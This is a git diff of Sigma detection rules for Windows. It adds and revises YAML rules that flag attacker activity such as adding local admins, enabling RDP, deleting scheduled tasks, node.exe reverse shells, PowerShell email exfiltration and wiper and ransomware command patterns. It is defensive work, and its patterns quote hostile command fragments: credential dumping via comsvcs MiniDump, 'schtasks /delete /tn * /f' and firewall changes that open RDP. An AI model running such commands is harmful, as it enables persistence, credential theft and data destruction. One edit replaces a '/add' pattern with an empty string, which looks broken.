26 ++++++++++ .../proc_creation_win_reg_enable_rdp.yml | 5 +- ...proc_creation_win_susp_add_local_admin.yml | 23 ++++++--- ...ation_win_susp_add_user_remote_desktop.yml | 24 ++++++--- ...creation_win_susp_new_service_creation.yml | 3 +- .../proc_creation_win_susp_reg_add.yml | 3 +- .../proc_creation_win_susp_reg_bitlocker.yml | 13 +++-- ...proc_creation_win_susp_schtasks_delete.yml | 36 +++++++++++++ ..._creation_win_susp_schtasks_delete_all.yml | 25 ++++++++++ ...roc_creation_win_susp_schtasks_disable.yml | 18 +++---- ...eation_win_susp_schtasks_schedule_type.yml | 18 ++++--- ...win_susp_schtasks_schedule_type_system.yml | 37 ++++++++++++++ ...creation_win_user_discovery_get_aduser.yml | 30 +++++++++++ .../proc_creation_win_wevtutil_recon.yml | 28 +++++++++++ .../registry_event_net_ntlm_downgrade.yml | 4 +- .../registry_set_disable_system_restore.yml | 8 +-- .../registry_set_enabling_turnoffcheck.yml | 3 +- .../registry_set_hide_function_user.yml | 2 +- ...stry_set_install_root_or_ca_certificat.yml | 2 +- ...set_winlogon_allow_multiple_tssessions.yml | 22 ++++++++ 33 files changed, 492 insertions(+), 127 deletions(-) create mode 100644 rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml create mode 100644 rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml create mode 100644 rules/windows/process_creation/proc_creation_win_net_add_local_user.yml create mode 100644 rules/windows/process_creation/proc_creation_win_node_abuse.yml create mode 100644 rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml create mode 100644 rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml create mode 100644 rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml create mode 100644 rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml create mode 100644 rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml create mode 100644 rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml create mode 100644 rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml b/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml index 11e8de26c..7340abc67 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml @@ -17,12 +17,12 @@ logsource: detection: selection1: ScriptBlockText|contains|all: - - 'Move-Item' - - 'Cert:\LocalMachine\Root' + - 'Move-Item' + - 'Cert:\LocalMachine\Root' selection2: ScriptBlockText|contains|all: - - 'Import-Certificate' - - 'Cert:\LocalMachine\Root' + - 'Import-Certificate' + - 'Cert:\LocalMachine\Root' condition: 1 of selection* falsepositives: - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP diff --git a/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml b/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml index e8169e203..5859e1083 100755 --- a/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml @@ -4,25 +4,25 @@ status: test description: Detects Hurricane Panda Activity author: Florian Roth references: - - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/ + - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/ date: 2019/03/04 modified: 2021/11/27 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - - CommandLine|contains|all: - - 'localgroup' - - 'admin' - - '/add' - - CommandLine|contains: - - '\Win64.exe' - condition: selection + selection: + - CommandLine|contains|all: + - 'localgroup' + - 'admin' + - '' + - CommandLine|contains: + - '\Win64.exe' + condition: selection falsepositives: - - Unknown + - Unknown level: high tags: - - attack.privilege_escalation - - attack.g0009 - - attack.t1068 + - attack.privilege_escalation + - attack.g0009 + - attack.t1068 diff --git a/rules/windows/process_creation/proc_creation_win_apt_wocao.yml b/rules/windows/process_creation/proc_creation_win_apt_wocao.yml index 8897c3feb..5aeb7d762 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_wocao.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_wocao.yml @@ -10,7 +10,7 @@ references: - https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/ - https://twitter.com/SBousseaden/status/1207671369963646976 tags: - - attack.discovery + - attack.discovery - attack.t1012 - attack.defense_evasion - attack.t1036.004 @@ -25,7 +25,7 @@ logsource: product: windows detection: selection: - CommandLine|contains: + CommandLine|contains: - 'checkadmin.exe 127.0.0.1 -all' - 'netsh advfirewall firewall add rule name=powershell dir=in' - 'cmd /c powershell.exe -ep bypass -file c:\s.ps1' @@ -39,4 +39,4 @@ detection: condition: selection falsepositives: - Administrators that use checkadmin.exe tool to enumerate local administrators -level: high \ No newline at end of file +level: high diff --git a/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml b/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml new file mode 100644 index 000000000..27af17f89 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml @@ -0,0 +1,30 @@ +title: Email Exifiltration Via Powershell +id: 312d0384-401c-4b8b-abdf-685ffba9a332 +status: experimental +description: Detects email exfiltration via powershell cmdlets +author: Nasreddine Bencherchali (rule), Azure-Sentinel (idea) +references: + - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ + - https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml +date: 2022/09/09 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: + - '\powershell.exe' + - '\pwsh.exe' + CommandLine|contains|all: + - 'Add-PSSnapin' + - 'Get-Recipient' + - '-ExpandProperty' + - 'EmailAddresses' + - 'SmtpAddress' + - '-hidetableheaders' + condition: selection +falsepositives: + - Unknown +level: high +tags: + - attack.exfiltration diff --git a/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml b/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml new file mode 100644 index 000000000..d4b9155c8 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml @@ -0,0 +1,32 @@ +title: Root Certificate Installed From Susp Locations +id: 5f6a601c-2ecb-498b-9c33-660362323afa +status: experimental +description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. +references: + - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ + - https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps +author: Nasreddine Bencherchali +date: 2022/09/09 +tags: + - attack.defense_evasion + - attack.t1553.004 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - 'Import-Certificate' + - ' -File-Path ' + - 'Cert:\LocalMachine\Root' + CommandLine|contains: + - '\AppData\Local\Temp\' + - 'C:\Windows\TEMP\' + - '\Desktop\' + - '\Downloads\' + - '\Perflogs\' + - 'C:\Users\Public\' + condition: selection +falsepositives: + - Unlikely +level: high diff --git a/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml b/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml index 6d2b0f135..010f2b9c5 100644 --- a/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml +++ b/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml @@ -1,27 +1,31 @@ title: Hermetic Wiper TG Process Patterns id: 2f974656-6d83-4059-bbdf-68ac5403422f status: experimental -description: This rule detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022 +description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022 author: Florian Roth references: - - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia + - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia date: 2022/02/25 -modified: 2022/08/13 +modified: 2022/09/09 +tags: + - attack.execution + - attack.lateral_movement + - attack.t1021.001 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection1: - Image|endswith: '\policydefinitions\postgresql.exe' - selection2: - - CommandLine|contains: - - 'CSIDL_SYSTEM_DRIVE\temp\sys.tmp' - - ' 1> \\\\127.0.0.1\ADMIN$\__16' - - CommandLine|contains|all: - - 'powershell -c ' - - '\comsvcs.dll MiniDump ' - - '\winupd.log full' - condition: 1 of selection* + selection1: + Image|endswith: '\policydefinitions\postgresql.exe' + selection2: + - CommandLine|contains: + - 'CSIDL_SYSTEM_DRIVE\temp\sys.tmp' + - ' 1> \\\\127.0.0.1\ADMIN$\__16' + - CommandLine|contains|all: + - 'powershell -c ' + - '\comsvcs.dll MiniDump ' + - '\winupd.log full' + condition: 1 of selection* falsepositives: - - Unknown + - Unknown level: high diff --git a/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml b/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml index 46f530fb0..7b5553b72 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml @@ -3,7 +3,7 @@ id: f57f8d16-1f39-4dcb-a604-6c73d9b54b3d description: Detects a command that accesses password storing registry hives via volume shadow backups author: Max Altgelt, Tobias Michalski date: 2021/08/09 -modified: 2022/08/13 +modified: 2022/09/09 status: experimental references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 @@ -25,7 +25,7 @@ detection: condition: all of selection* falsepositives: - Some rare backup scenarios -level: medium +level: high tags: - attack.impact - - attack.t1490 \ No newline at end of file + - attack.t1490 diff --git a/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml b/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml index 61ff3daf2..699f0e26e 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml @@ -4,36 +4,36 @@ status: test description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil author: Florian Roth, Tom Ueltschi references: - - https://securelist.com/schroedingers-petya/78870/ - - https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100 + - https://securelist.com/schroedingers-petya/78870/ + - https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100 date: 2019/01/16 modified: 2022/03/05 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - select_pipe_com: - CommandLine|contains|all: - - '\AppData\Local\Temp\' - - '\\\\.\\pipe\\' - select_rundll32_dash1: - Image|endswith: '\rundll32.exe' - CommandLine|endswith: - - '.dat,#1' - - '.dat #1' # Sysmon removes comma - select_perfc_keyword: - - '\perfc.dat' - condition: 1 of select* + select_pipe_com: + CommandLine|contains|all: + - '\AppData\Local\Temp\' + - '\\\\.\\pipe\\' + select_rundll32_dash1: + Image|endswith: '\rundll32.exe' + CommandLine|endswith: + - '.dat,#1' + - '.dat #1' # Sysmon removes comma + select_perfc_keyword: + - '\perfc.dat' + condition: 1 of select* fields: - - CommandLine - - ParentCommandLine + - CommandLine + - ParentCommandLine falsepositives: - - Admin activity + - Admin activity level: critical tags: - - attack.defense_evasion - - attack.t1218.011 - - attack.t1070.001 - - attack.credential_access - - attack.t1003.001 - - car.2016-04-002 + - attack.defense_evasion + - attack.t1218.011 + - attack.t1070.001 + - attack.credential_access + - attack.t1003.001 + - car.2016-04-002 diff --git a/rules/windows/process_creation/proc_creation_win_net_add_local_user.yml b/rules/windows/process_creation/proc_creation_win_net_add_local_user.yml new file mode 100644 index 000000000..d7cc1ee7b --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_net_add_local_user.yml @@ -0,0 +1,26 @@ +title: Net User Add Local User +id: 57ea3cf7-f2bf-419f-b51e-6a60635ebf0d +status: stable +description: Detects attempts to add new local user +references: + - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html +author: Nasreddine Bencherchali +date: 2022/09/09 +tags: + - attack.persistence + - attack.t1136.001 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: + - '\net.exe' + - '\net1.exe' + CommandLine|contains|all: + - ' user ' + - '/add' + condition: selection +falsepositives: + - Legitimate use of net.exe utility by legitimate users and admins to add local user +level: low diff --git a/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml b/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml index 8dedecc69..8144e75f1 100644 --- a/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml +++ b/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml @@ -6,7 +6,9 @@ author: Nasreddine Bencherchali references: - https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ + - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ date: 2022/09/01 +modified: 2022/09/09 logsource: category: process_creation product: windows @@ -28,6 +30,7 @@ detection: - ' Administratör ' # Swedish - ' Administrator ' # English - ' guest ' + - ' DefaultAccount ' # The cases below are for when an attacker requests the net command via 'cmd /c....' # First in double quotes - ' "Järjestelmänvalvoja" ' # Finish @@ -38,6 +41,7 @@ detection: - ' "Administratör" ' # Swedish - ' "Administrator" ' # English - ' "guest" ' + - ' "DefaultAccount" ' # Second in single quotes - " 'Järjestelmänvalvoja' " # Finish - " 'Rendszergazda' " # Hungarian @@ -47,6 +51,7 @@ detection: - " 'Administratör' " # Swedish - " 'Administrator' " # English - " 'guest' " + - " 'DefaultAccount' " filter: CommandLine|contains|all: - 'guest' diff --git a/rules/windows/process_creation/proc_creation_win_net_recon.yml b/rules/windows/process_creation/proc_creation_win_net_recon.yml index 7a57ffdbf..d67432ef9 100644 --- a/rules/windows/process_creation/proc_creation_win_net_recon.yml +++ b/rules/windows/process_creation/proc_creation_win_net_recon.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE author: Florian Roth, omkar72, @svch0st, Nasreddine Bencherchali date: 2019/01/16 -modified: 2022/09/02 +modified: 2022/09/09 references: - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/ @@ -33,11 +33,13 @@ detection: CommandLine|contains: # Add more groups for other languages - 'domain admins' - - ' administrators' - - ' administrateurs' + - ' administrator' # Typo without an 'S' so we catch both + - ' administrateur' # Typo without an 'S' so we catch both - 'enterprise admins' - 'Exchange Trusted Subsystem' - 'Remote Desktop Users' + - 'Utilisateurs du Bureau à distance' # French for "Remote Desktop Users" + - 'Usuarios de escritorio remoto' # Spanish for "Remote Desktop Users" - ' /do' # short for domain # Covers 'accounts' flag selection_accounts_root: diff --git a/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml b/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml index f2179507f..a0297ae22 100644 --- a/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml +++ b/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml @@ -13,16 +13,16 @@ logsource: detection: selection1: CommandLine|contains|all: - - netsh - - firewall add portopening - - tcp 3389 + - 'netsh' + - 'firewall add portopening' + - 'tcp 3389' selection2: CommandLine|contains|all: - - netsh - - advfirewall firewall add rule - - action=allow - - protocol=TCP - - localport=3389 + - 'netsh' + - 'advfirewall firewall add rule' + - 'action=allow' + - 'protocol=TCP' + - 'localport=3389' condition: 1 of selection* falsepositives: - Legitimate administration diff --git a/rules/windows/process_creation/proc_creation_win_node_abuse.yml b/rules/windows/process_creation/proc_creation_win_node_abuse.yml new file mode 100644 index 000000000..9f3f670c7 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_node_abuse.yml @@ -0,0 +1,34 @@ +title: Node.exe Process Abuse +id: 6640f31c-01ad-49b5-beb5-83498a5cd8bd +status: experimental +description: Detects the execution node.exe which is shipped with multiple softwares such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc +references: + - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html + - https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return + - https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/ + - https://nodejs.org/api/cli.html +author: Nasreddine Bencherchali +date: 2022/09/09 +tags: + - attack.defense_evasion + - attack.t1127 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\node.exe' + CommandLine|contains: + - ' -e ' + - ' --eval ' + # Add more pattern of abuse as actions + action_reverse_shell: + CommandLine|contains|all: + - '.exec(' + - 'net.socket' + - '.connect' + - 'child_process' + condition: selection and 1 of action_* +falsepositives: + - Unlikely +level: high diff --git a/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml b/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml new file mode 100644 index 000000000..bbb5763ce --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml @@ -0,0 +1,26 @@ +title: Suspicious Redirect To Local Admin Share +id: 77d570aa-4e72-4949-98ff-24cdeec16787 +status: experimental +description: Detects output redirection to the local admin share (ADMIN$) via the commandline +author: Nasreddine Bencherchali +references: + - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html +date: 2022/09/09 +tags: + - attack.execution + - attack.lateral_movement + - attack.t1021.001 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + - ' 1 > \\\\127.0.0.1\ADMIN$\' + - ' 1> \\\\127.0.0.1\ADMIN$\' + - ' 1 >\\\\127.0.0.1\ADMIN$\' + - ' 1>\\\\127.0.0.1\ADMIN$\' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml b/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml index 59ecd7e3a..b99236f7c 100644 --- a/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml @@ -6,7 +6,7 @@ author: '@Kostastsale, @TheDFIRReport, slightly modified by pH-T' references: - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ date: 2022/02/12 -modified: 2022/08/06 +modified: 2022/09/09 logsource: product: windows category: process_creation @@ -15,7 +15,7 @@ detection: Image|endswith: '\reg.exe' CommandLine|contains|all: - ' add ' - - '\SYSTEM\CurrentControlSet\Control\Terminal Server' + - '\CurrentControlSet\Control\Terminal Server' - 'REG_DWORD' - ' /f' selection_values_1: @@ -34,6 +34,7 @@ detection: - 'TSAdvertise' - 'AllowTSConnections' - 'fSingleSessionPerUser' + - 'fDenyTSConnections' condition: selection_cli and 1 of selection_values_* falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml b/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml index ccce2dfb8..70609b700 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml @@ -1,9 +1,13 @@ title: Add User to Local Administrators id: ad720b90-25ad-43ff-9b5e-5c841facc8e5 +related: + - id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e + type: similar status: experimental -description: Detects suspicious command line that adds an account to the local administrators group -author: Florian Roth +description: Detects suspicious command line that adds an account to the local administrators/administrateurs group +author: Florian Roth, Nasreddine Bencherchali date: 2022/08/12 +modified: 2022/09/09 references: - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 logsource: @@ -13,11 +17,18 @@ tags: - attack.persistence - attack.t1098 detection: - selection: - CommandLine|contains|all: - - 'localgroup administrators ' + selection_main: + - CommandLine|contains|all: + - 'localgroup ' - ' /add' - condition: selection + - CommandLine|contains|all: + - 'Add-LocalGroupMember ' + - ' -Group ' + selection_group: + CommandLine|contains: + - ' administrators ' + - ' administrateur' # Typo without an 'S' so we catch both + condition: all of selection_* falsepositives: - Administrative activity level: medium diff --git a/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml b/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml index 9a00f386a..fb61b61ee 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml @@ -1,28 +1,38 @@ title: Suspicious Add User to Remote Desktop Users Group id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e +related: + - id: ad720b90-25ad-43ff-9b5e-5c841facc8e5 + type: similar status: experimental description: Detects suspicious command line in which a user gets added to the local Remote Desktop Users group author: Florian Roth date: 2021/12/06 +modified: 2022/09/09 references: - https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/ tags: - attack.persistence + - attack.lateral_movement - attack.t1133 - attack.t1136.001 - - attack.lateral_movement - attack.t1021.001 logsource: category: process_creation product: windows detection: - selection: - CommandLine|contains|all: - - 'net ' - - 'localgroup' + selection_main: + - CommandLine|contains|all: + - 'localgroup ' + - ' /add' + - CommandLine|contains|all: + - 'Add-LocalGroupMember ' + - ' -Group ' + selection_group: + CommandLine|contains: - 'Remote Desktop Users' - - '/add' - condition: selection + - 'Utilisateurs du Bureau à distance' # French for "Remote Desktop Users" + - 'Usuarios de escritorio remoto' # Spanish for "Remote Desktop Users" + condition: all of selection_* fields: - CommandLine - ParentCommandLine diff --git a/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml b/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml index 5b184ccfb..ff0b5b957 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml @@ -10,7 +10,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html date: 2022/07/14 -modified: 2022/08/04 +modified: 2022/09/09 logsource: category: process_creation product: windows @@ -35,6 +35,7 @@ detection: - 'dllhost' - 'cmd ' - 'cmd.exe /c' + - 'cmd.exe /k' - 'rundll32' # Add more suspicious paths - 'C:\Users\Public' diff --git a/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml b/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml index c034f4a89..e8fa9ebea 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md author: frack113, Nasreddine Bencherchali date: 2022/08/19 -modified: 2022/09/08 +modified: 2022/09/09 logsource: category: process_creation product: windows @@ -22,6 +22,7 @@ detection: - '\Policies\Microsoft\Windows\OOBE' - '\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon' - '\CurrentControlSet\Control\SecurityProviders\WDigest' + - '\Microsoft\Windows Defender\' condition: all of selection_* falsepositives: - Rare legitimate add to registry via cli (to these locations) diff --git a/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml b/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml index 791985d1a..31d6d74ac 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml @@ -1,7 +1,7 @@ title: Suspicious Reg Add BitLocker id: 0e0255bf-2548-47b8-9582-c0955c9283f5 status: experimental -description: Suspicious add key for BitLocker +description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility references: - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/ tags: @@ -9,19 +9,18 @@ tags: - attack.t1486 author: frack113 date: 2021/11/15 -modified: 2022/08/05 +modified: 2022/09/09 logsource: category: process_creation product: windows detection: - set: + selection: CommandLine|contains|all: - 'REG' - 'ADD' - '\SOFTWARE\Policies\Microsoft\FVE' - '/v' - '/f' - key: CommandLine|contains: - 'EnableBDEWithNoTPM' - 'UseAdvancedStartup' @@ -31,7 +30,7 @@ detection: - 'RecoveryKeyMessageSource' - 'UseTPMPIN' - 'RecoveryKeyMessage' - condition: set and key + condition: selection falsepositives: - - Unknown -level: medium + - Unlikely +level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml new file mode 100644 index 000000000..aa3f20a37 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml @@ -0,0 +1,36 @@ +title: Delete Important Scheduled Task +id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 +related: + - id: 9ac94dc8-9042-493c-ba45-3b5e7c86b980 + type: derived +status: experimental +description: Detects when adversaries stop services or processes by disabling their respective schdueled tasks in order to conduct data destructive activities +author: Nasreddine Bencherchali +references: + - Internal Research +date: 2022/09/09 +logsource: + category: process_creation + product: windows +detection: + schtasks_exe: + Image|endswith: '\schtasks.exe' + CommandLine|contains|all: + - '/delete' + - '/tn' + CommandLine|contains: + # Add more important tasks + - '\Windows\SystemRestore\SR' + - '\Windows\Windows Defender\' + - '\Windows\BitLocker' + - '\Windows\WindowsBackup\' + - '\Windows\WindowsUpdate\' + - '\Windows\UpdateOrchestrator\' + - '\Windows\ExploitGuard' + condition: all of schtasks_* +falsepositives: + - Unlikely +level: high +tags: + - attack.impact + - attack.t1489 diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml new file mode 100644 index 000000000..28aefc946 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml @@ -0,0 +1,25 @@ +title: Delete All Scheduled Tasks +id: 220457c1-1c9f-4c2e-afe6-9598926222c1 +status: experimental +description: Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users. +author: Nasreddine Bencherchali +references: + - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete +date: 2022/09/09 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\schtasks.exe' + CommandLine|contains|all: + - ' /delete ' + - '/tn *' + - ' /f' + condition: selection +falsepositives: + - Unlikely +level: high +tags: + - attack.impact + - attack.t1489 diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml index 2abc0aaa4..e46a19f3b 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml @@ -1,7 +1,7 @@ title: Disable Important Scheduled Task id: 9ac94dc8-9042-493c-ba45-3b5e7c86b980 status: experimental -description: Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange, SQL Server...etc. +description: Detects when adversaries stop services or processes by disabling their respective schdueled tasks in order to conduct data destructive activities author: frack113, Nasreddine Bencherchali references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task @@ -19,15 +19,15 @@ detection: - '/Change' - '/TN' - '/disable' - #split to add other CommandLine|contains: - - 'Microsoft\Windows\SystemRestore\SR' - - 'Microsoft\Windows\Windows Defender\' - - 'Microsoft\Windows\BitLocker' - - 'Microsoft\Windows\WindowsBackup\' - - 'Microsoft\Windows\WindowsUpdate\' - - 'Microsoft\Windows\UpdateOrchestrator\' - - 'Windows\ExploitGuard' + # Add more important tasks + - '\Windows\SystemRestore\SR' + - '\Windows\Windows Defender\' + - '\Windows\BitLocker' + - '\Windows\WindowsBackup\' + - '\Windows\WindowsUpdate\' + - '\Windows\UpdateOrchestrator\' + - '\Windows\ExploitGuard' condition: all of schtasks_* falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml index e34973df4..6ffa9e601 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml @@ -1,15 +1,19 @@ -title: Suspicious Schtasks Schedule Type -id: 7a02e22e-b885-4404-b38b-1ddc7e65258a -description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type +title: Suspicious Schtasks Schedule Types +id: 24c8392b-aa3c-46b7-a545-43f71657fe98 